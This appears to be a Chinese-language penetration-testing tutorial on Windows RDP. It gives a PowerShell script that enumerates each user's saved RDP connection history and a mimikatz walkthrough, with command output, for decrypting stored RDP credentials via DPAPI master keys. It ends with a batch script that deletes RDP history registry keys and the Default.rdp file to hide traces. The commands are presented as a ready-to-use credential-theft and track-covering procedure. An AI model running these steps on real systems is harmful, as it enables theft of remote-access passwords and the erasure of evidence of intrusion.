以下代码为3gStudent实现的获取连接记录的代码:
- <#
- .SYNOPSIS
- This script will list the logged-in users' RDP Connections History.
- Author: 3gstudent@3gstudent
- License: BSD 3-Clause
- #>
- $AllUser = Get-WmiObject -Class Win32_UserAccount
- foreach($User in $AllUser)
- {
- $RegPath = "Registry::HKEY_USERS\"+$User.SID+"\Software\Microsoft\Terminal Server Client\Servers\"
- Write-Host "User:"$User.Name
- Write-Host "SID:"$User.SID
- Write-Host "Status:"$User.Status
- Try
- {
- $QueryPath = dir $RegPath -Name -ErrorAction Stop
- }
- Catch
- {
- Write-Host "No RDP Connections History"
- Write-Host "----------------------------------"
- continue
- }
- foreach($Name in $QueryPath)
- {
- Try
- {
- $User = (Get-ItemProperty -Path $RegPath$Name -ErrorAction Stop).UsernameHint
- Write-Host "User:"$User
- Write-Host "Server:"$Name
- }
- Catch
- {
- Write-Host "No RDP Connections History"
- }
- }
- Write-Host "----------------------------------"
- }
-
用法:powershell xxx.ps1
破解RDP连接凭证的前提是用户在连接远程主机时勾选了保存保存凭证。
1、查找本地的Credentials
- dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
-
2、使用mimikatz进行操作
下载
- mimikatz dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6
-
-
得到:
- mimikatz # dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6
- **BLOB**
- dwVersion : 00000001 - 1
- guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
- dwMasterKeyVersion : 00000001 - 1
- guidMasterKey : {ffc994a1-de8d-4304-9416-31e587f7a8ca}
- dwFlags : 20000000 - 536870912 (system ; )
- dwDescriptionLen : 00000030 - 48
- szDescription : Local Credential Data
-
- algCrypt : 00006610 - 26128 (CALG_AES_256)
- dwAlgCryptLen : 00000100 - 256
- dwSaltLen : 00000020 - 32
- pbSalt : 00fed8ca7ec6d44585dd1fbd8b57e77b6ab0cf318ec5d52d09fd0694ffb89ccb
- dwHmacKeyLen : 00000000 - 0
- pbHmackKey :
- algHash : 0000800e - 32782 (CALG_SHA_512)
- dwAlgHashLen : 00000200 - 512
- dwHmac2KeyLen : 00000020 - 32
- pbHmack2Key : b49ef55f909fa503eda37ddc797c83c99df983920bfb4628e07aac5cb32bb530
- dwDataLen : 000000b0 - 176
- pbData : 4083f8f501b999a35c4aa57ce732bf52d30a6e604dac5a91b6fd3e65660c52a536025c5126f0d12b85044498deef08a8688b3459f49514ed6ae46271a1cb4cd0e70845d9b6beccbcbe85dead0fb7c80b4f7810add87b75c48592fcbfbbfd94fa4eee8004f8cf6d9619ef4b9af643f4c9ef0e8a2a5b0cd00530a5638cfd114fee4b735ac12eef2c7e6a0364845eb0ee4b3ab121e33324f8d5af48f3422bd47a76ab5e9e9e5a1a383e22fff8bf851b6a2a
- dwSignLen : 00000040 - 64
- pbSign : 7c8dbe7991c6af4d3bfc9f808790a0904738d0ca227bc2ee20ee26cbf06487dd2679e932b27ea0c0cbbe590ee6430641605d7001b2158c8873c5d6a09a9855a8
-
接下来需要使用的就是guidMasterKey、pbData数据。pbData是凭据的加密数据,guidMasterKey是凭据的GUID
3、使用sekurlsa::dpapi
- mimikatz privilege::debug sekurlsa::dpapi
-
根据目标凭据GUID: {ffc994a1-de8d-4304-9416-31e587f7a8ca}找到其关联的MasterKey,这个MasterKey就是加密凭据的密钥,即解密pbData所必须的东西。
4、解密
- dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6 /masterkey:e01320a53bf9d57da1163c7723a5b3901df5a3fc8e504fc021def2637d19d34c0084a3ac2a0daab3fb9af3f98c48a9a901627dc4b10db087cb357e1d2f8aa18c
-
- 下面这段MasterKey:
- e01320a53bf9d57da1163c7723a5b3901df5a3fc8e504fc021def2637d19d34c0084a3ac2a0daab3fb9af3f98c48a9a901627dc4b10db087cb357e1d2f8aa18c
-
注册表HKCU:\Software\Microsoft\Terminal Server Client\
针对上述的Default、Server,对其表项进行删除
tips:由于在删除Server表项的时候无法一次选择所有表项,因为可以直接删除整个Server再新建。
然后删除默认的rdp连接文件:
- @echo off
- reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f # 删除Default中的所有值
- reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f # 删除整个Servers
- reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" 重新创建删除的注册表项
- cd %userprofile%\documents\ # 转到Default.rdp文件目录
- attrib Default.rdp -s -h # 更改Default.rdp文件属性,默认情况下它是隐藏
- del Default.rdp # 删除文件Default.rdp文件
-
以上参考链接:https://rcoil.me/2018/05/%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/
湘公网安备 43102202000103号
